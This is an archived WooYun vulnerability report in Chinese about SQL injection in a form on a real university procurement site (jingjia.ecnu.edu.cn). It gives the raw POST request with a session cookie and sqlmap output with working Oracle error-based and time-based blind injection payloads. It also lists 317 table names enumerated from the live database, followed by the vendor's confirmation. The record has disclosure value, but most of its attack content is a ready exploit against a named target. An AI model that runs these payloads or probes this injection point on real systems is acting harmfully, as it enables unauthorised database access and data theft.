乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-08: 细节已通知厂商并且等待厂商处理中 2015-11-10: 厂商已经确认,细节仅向厂商公开 2015-11-20: 细节向核心白帽子及相关领域专家公开 2015-11-30: 细节向普通白帽子公开 2015-12-10: 细节向实习白帽子公开 2015-12-25: 细节向公众公开
POST /sggl/wsjj/mmzh.jsp HTTP/1.1Content-Length: 16Content-Type: application/x-www-form-urlencodedReferer: http://jingjia.ecnu.edu.cnCookie: JSESSIONID=CFCB2542C85EB9F5DB8A9BEFCAFA1BDBHost: jingjia.ecnu.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*email=1&xm=1
sqlmap resumed the following injection point(s) from stored session:---Parameter: email (POST) Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS) Payload: email=1' AND 8844=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(118)||CHR(118)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (8844=8844) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(106)||CHR(118)||CHR(113)) AND 'OJmn'='OJmn&xm=1 Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: email=1' AND 2558=DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(106)||CHR(104)||CHR(108),5) AND 'mcWd'='mcWd&xm=1---back-end DBMS: OracleDatabase: ZC[317 tables]+--------------------+| AQCHEN_338 || AQCHEN_GXJJ_YQDC || AQCHEN_ORG01 || AQCHEN_T_SB || A_TMP_BH || E$_ZC_BM_TEMP || E$_ZC_JFB_TEMP || E$_ZC_JFKMYE_TEMP || E$_ZC_YH_TEMP || I$_ZC_BM_TEMP_LOG || I$_ZC_JFB_TEMP_LOG || I$_ZC_YH_TEMP_LOG || PLAN_TABLE || RY || RYLX || SNP_CHECK_TAB || SYS_KFRWGL || SYS_RYGL || T_JCSJ_DM || T_XTGL_SJB || T_XTGL_SJBZD || XLLX || ZCLX || ZC_AZDD || ZC_BDLX || ZC_BDSQBDYY || ZC_BDSQD || ZC_BDSQKP || ZC_BDSQLB || ZC_BDXZ || ZC_BH2SYS_DW || ZC_BH2SYS_KCK || ZC_BH2SYS_RY || ZC_BH2SYS_SJ6 || ZC_BH2SYS_SJ7 || ZC_BH2SYS_SYMC || ZC_BH2SYS_SYXM || ZC_BHDZ_BDK || ZC_BHDZ_ZJK || ZC_BHJJ_BDK || ZC_BHJJ_ZJK || ZC_BHSB_BDK || ZC_BHSB_FJK || ZC_BHSB_ZJK || ZC_BLZT || ZC_BLZTPZ || ZC_BM || ZC_BMNDJC || ZC_BMNDJCCXTJ || ZC_BM_20151019 || ZC_BM_TEMP || ZC_BZD || ZC_BZDJFLY || ZC_BZDMS || ZC_BZDPTCX || ZC_BZDPZ || ZC_CWRECORD_TEMP || ZC_CWZJDJD || ZC_CZBMBPZ || ZC_CZBZCDL || ZC_CZBZCFL || ZC_DMZHB || ZC_DQKPXX || ZC_DQKPXXM200912 || ZC_DQKPXXM201012 || ZC_DQKPXXM201112 || ZC_DQKPXXM201208 || ZC_DQKPXXM201212 || ZC_DQKPXXM201308 || ZC_DQKPXXM201312 || ZC_DQKPXXM201408 || ZC_DQKPXXM201412 || ZC_DQKPXXM201508 || ZC_DXQY_GG || ZC_DXYQDWFW || ZC_DXYQJZRY || ZC_DXYQXX || ZC_DXYQ_CEJL || ZC_DXYQ_CEPJ || ZC_DXYQ_DJCSCSSJ || ZC_DXYQ_FL || ZC_DXYQ_FMZL || ZC_DXYQ_HJQK || ZC_DXYQ_KFSJD || ZC_DXYQ_KFSJDFA || ZC_DXYQ_KJCG || ZC_DXYQ_LWQK || ZC_DXYQ_NDKHB || ZC_DXYQ_PXQK || ZC_DXYQ_RJH || ZC_DXYQ_SC || ZC_DXYQ_YJH || ZC_DXYQ_YYD || ZC_DXYQ_YYDDCYP || ZC_DXYQ_YYDYYSJ || ZC_DXYQ_YYZTXGJL || ZC_DXYQ_ZJH || ZC_DXYQ_ZJHMX || ZC_EXPORTLIST || ZC_FCBZ || ZC_FCBZPZ || ZC_FCMJ || ZC_FCPZ || ZC_FCPZBZ || ZC_FCPZDL || ZC_FCPZXL || ZC_FIELDOFTABLE || ZC_FJ || ZC_FJJY || ZC_FJJYKP || ZC_FJJYSQ || ZC_FJJYSQKP || ZC_FJSY || ZC_GBZCDL || ZC_GBZCFL || ZC_GGDMCXTJ || ZC_GJDL || ZC_GJXL || ZC_GNCD || ZC_HMDYH || ZC_JFB || ZC_JFB_TEMP || ZC_JFFP || ZC_JFKMYE || ZC_JFKMYE_TEMP || ZC_JFLY || ZC_JFYS || ZC_JFYSLS || ZC_JFZD || ZC_JFZKK || ZC_JFZL || ZC_JGYQSYXY || ZC_JKDJB || ZC_JKDLGS || ZC_JKSBBLQK || ZC_JS || ZC_JSGNQX || ZC_JWZCFL || ZC_JYJL || ZC_JYSQD || ZC_KPBDXX || ZC_KPMS || ZC_KPPZ || ZC_KPTJBB || ZC_KPTJBBCX || ZC_KPXX || ZC_LC || ZC_LCJD || ZC_LSBZD || ZC_LSBZDJFLY || ZC_LSJFLY || ZC_LSKPXX || ZC_LSSGD || ZC_LSSGDJFLY || ZC_PDHZB || ZC_PDJL || ZC_PDSJLSB || ZC_PEDL || ZC_PEPZ || ZC_PETJ || ZC_PEXL || ZC_PJJB || ZC_QCPKB || ZC_QCPYB || ZC_QCSBPZB || ZC_QXCXTJ || ZC_RWCX || ZC_RWSJ || ZC_RWSJX || ZC_RWZX || ZC_RWZXBM || ZC_RWZXJD || ZC_RY || ZC_RYLX || ZC_SBBB || ZC_SBBBCXTJ || ZC_SBBBPZ || ZC_SBBBZT || ZC_SBBDXZ || ZC_SBBDYY || ZC_SBD || ZC_SBKP || ZC_SBQG || ZC_SBSJTXJD || ZC_SGCYWP || ZC_SGD || ZC_SGDCGY || ZC_SGDJFLY || ZC_SGDMS || ZC_SGDPZ || ZC_SGHT || ZC_SGHTFKQK || ZC_SGHTJFLY || ZC_SGHTPZ || ZC_SGHTXGSGD || ZC_SGSCDY || ZC_SGZB || ZC_SGZBFB || ZC_SGZBJJD || ZC_SGZBJJDMX || ZC_SGZBXGSGD || ZC_SGZBXGSGD_LSB || ZC_SGZBXGSGD_XG || ZC_SGZB_BLQK || ZC_SGZB_CGPS || ZC_SGZB_JDLB || ZC_SGZB_JG || ZC_SGZB_PBJDZ || ZC_SGZB_PBMXXX || ZC_SGZB_PBZJ || ZC_SGZB_PBZJZ || ZC_SGZB_PBZJ_CGXM || ZC_SGZB_PBZJ_ZZLW || ZC_SGZB_PFB || ZC_SGZB_PFBF || ZC_SGZB_PFFA || ZC_SGZB_PFFA_PFBF || ZC_SGZB_TBXX || ZC_SGZB_ZHDFB || ZC_SHZCFL || ZC_SJDX || ZC_SJSJRW || ZC_SJZD || ZC_SJZDBM || ZC_SYSGLCXTJ || ZC_SYSGLSJ || ZC_SYSGLSJMS || ZC_SYSKP || ZC_SYSKPMS || ZC_SYSKPZX || ZC_TJBBPZCS || ZC_TSHJY || ZC_TYBMS || ZC_WPCK || ZC_WPCKD || ZC_WPCKDMX || ZC_WPFKDJD || ZC_WPFKLYSQD || ZC_WPFL || ZC_WPFL_TEMP || ZC_WPGYDW || ZC_WPKC || ZC_WPLYSQD || ZC_WPLYSQDMX || ZC_WPRKD || ZC_WPRKDMX || ZC_WPRKSQD || ZC_WPRKSQDMX || ZC_WPSYDJD || ZC_WPXX || ZC_WPXX_IMP || ZC_WPYDJC || ZC_WPYDJCMX || ZC_WXJL || ZC_WXJLKP || ZC_WXJLMX || ZC_WXSQD || ZC_XLLX || ZC_XQ || ZC_XTCS || ZC_XTCS_CLOB || ZC_XTGG || ZC_XTGGCX || ZC_XTGGLM || ZC_XTRZ || ZC_XTRZ_HISTORY || ZC_XTRZ_OPERATE || ZC_XTRZ_PZXX || ZC_XX || ZC_XXBMBM || ZC_XXTZ || ZC_XXTZ_LS || ZC_YH || ZC_YHBBQX || ZC_YHBMQX || ZC_YHBMQXCX || ZC_YHXQQX || ZC_YHZ || ZC_YHZCLXQX || ZC_YHZSHJS || ZC_YH_TEMP || ZC_YQLJ || ZC_YSTZ || ZC_YSXX || ZC_YSXXZQTZ || ZC_YSZT || ZC_YW || ZC_YWBM_SPBEAN || ZC_YWDBR || ZC_YWDBRSZLOG || ZC_YWFJ || ZC_YWFJFL || ZC_YWFL_BLOB || ZC_YWLZ || ZC_YWLZGJDCLR || ZC_YWLZRZ || ZC_YWMXXMCLQK || ZC_YXBM || ZC_YXJFLY || ZC_ZC || ZC_ZCBZCXTJ || ZC_ZCDL || ZC_ZCDLJGXZ || ZC_ZCFL || ZC_ZCFL1 || ZC_ZCGYS || ZC_ZCGYSNS || ZC_ZCGYSPJ || ZC_ZCLX || ZC_ZCPTYH || ZC_ZCSX || ZC_ZDPZ || ZC_ZFBKD || ZC_ZFJFB || ZC_ZFPZ || ZWLX || ZWLX2 |+--------------------+
危害等级:高
漏洞Rank:10
确认时间:2015-11-10 08:22
通知二级单位处理。
暂无
